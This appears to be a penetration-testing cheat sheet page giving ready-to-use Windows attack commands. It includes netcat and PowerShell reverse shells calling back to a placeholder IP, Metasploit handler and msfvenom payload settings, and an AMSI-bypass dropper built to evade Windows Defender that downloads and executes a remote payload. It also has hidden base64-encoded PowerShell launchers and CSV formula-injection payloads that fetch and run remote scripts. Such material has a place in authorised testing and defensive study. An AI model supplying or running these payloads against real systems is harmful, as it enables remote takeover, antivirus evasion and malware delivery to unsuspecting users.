Skip to main content

Reverse Shell

Netcat​

nc.exe <ip> <port> -e cmd.exe

Unicorn​

python unicorn.py windows/meterpreter/reverse_https <ip> <port>

MSF​

exploit/windows/smb/smb_delivery

PowerShell​

Process 64Bit

c:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell "IEX(New-Object Net.WebClient).downloadstring('http://<ip>/<shell.ps1>')"
/usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1
$client = New-Object System.Net.Sockets.TCPClient("<ip>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Attachment

reverse_shell.ps1

Bypass Windows Defender​

info

The technique below uses a bypass for the AMSI and uses system proxy credentials.

Last time it has been tested: 28/06/2018.

Handler RC file​

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set LURI /api/callback
set ExitonSession false

Payload​

msfvenom -p windows/x64/meterpreter/reverse_https lhost=<ip/domain> lport=443 luri=/api/callback -e x64/xor -f psh-net -o payload.pshnet
python -m SimpleHTTPServer 80

Dropper build​

tip

Encode the dropper with CyberChef, UTF16LE (1200) => to_base64.

$mem=[System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076);[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiSession','NonPublic,Static').SetValue($null, $null);[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext','NonPublic,Static').SetValue($null, [IntPtr]$mem);[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$e=new-object net.webclient;$e.proxy=[Net.WebRequest]::GetSystemWebProxy();$e.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $e.downloadstring('http://<ip/domain>/payload.pshnet')

Encode the dropper with PowerShell

#B64 Ecoding:
$Base64 = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes([System.IO.File]::ReadAllText("C:\Users\<..>\amsi-bypass.ps1")))
Write-Output $Base64| Out-File "payload-b64"

#B64 Decoding:
$bytes = [Convert]::FromBase64String($Base64)
[IO.File]::WriteAllBytes("C:\Users\<..>\payload-b64-decoded", $bytes)

Final dropper​

powershell.exe -NoP -NonI -W Hidden -e <base64_cyberchef>

CSV injection​

PoC​

=cmd|' /c calc'!A1
=cmd|'/c REM.&&@p^o^w^e^r^s^h^e^l^l c:/*/*2/?al?.?x?"'!_xlbgnm.A1
info

For powershell the convertion in B64 must be done in unicode (see below).

Short payload​

$Base64 = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes([System.IO.File]::ReadAllText("C:\Users\rsh.ps1")))
Write-Output $Base64 |  Out-File -FilePath "C:\Users\rsh.b64"

#Content of f file:
powershell -e <C:\Users\rsh.b64>

powershell "wget 192.168.1.1/f|iex"

DownloadString​

tip

Use double simple quote to escape simple quote in #Powershell Iex payload (even if b64 encoded)

=cmd|'/c powershell.exe -command iex (new-object Net.WebClient).DownloadString(''http://<ip/domain>/f.ps1'')'!_A1